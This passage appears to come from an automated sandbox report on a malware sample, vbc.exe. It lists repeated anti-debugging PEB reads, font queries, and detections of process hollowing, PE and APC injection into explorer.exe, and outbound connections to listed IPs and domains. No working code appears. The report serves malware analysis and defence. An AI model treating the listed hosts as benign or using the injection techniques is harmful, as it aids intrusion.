        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016714FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CEF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CFF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DF716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EE730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F37F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C8794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E8E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BE620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E36CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F8EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E16E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016346A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 192.185.131.238 80
        Source: C:\Windows\explorer.exeNetwork Connect: 108.167.169.56 80
        Source: C:\Windows\explorer.exeNetwork Connect: 103.141.97.24 80
        Source: C:\Windows\explorer.exeDomain query: www.funwave.info
        Source: C:\Windows\explorer.exeDomain query: www.tadeumilhosrp.com
        Source: C:\Windows\explorer.exeDomain query: www.reprograme-se10x.com
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\vbc.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: AF0000
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\vbc.exeMemory written: C:\Users\user\Desktop\vbc.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\vbc.exeThread register set: target process: 3688
        Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3688
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.534282769.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.410398740.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
